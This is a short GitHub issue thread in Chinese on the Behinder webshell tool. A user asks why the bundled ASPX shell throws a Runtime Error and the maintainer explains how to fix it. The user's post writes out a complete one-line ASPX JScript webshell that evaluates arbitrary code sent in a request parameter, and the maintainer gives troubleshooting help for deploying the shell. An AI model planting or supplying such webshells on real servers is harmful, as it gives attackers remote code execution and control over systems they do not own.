### ISSUE TITLE
Aspx马出现Runtime Error有通过更改代码的办法解决么

### ISSUE THREAD

**Issue by Lv-Max** [rebeyond/Behinder#4]
最简单的<%@ Page Language="Jscript"%><%eval(Request.Item["p"],"unsafe");%>可以执行，但是用提供的shell code出现Runtime Error

**Comment by rebeyond** [comment]
随客户端提供的aspx shell是最简版本，没有加入容错代码，所以浏览器直接访问会保错，用冰蝎客户端可以正常连接。避免直接浏览器访问页面保错，可以在aspx shell中加一下判断语句。
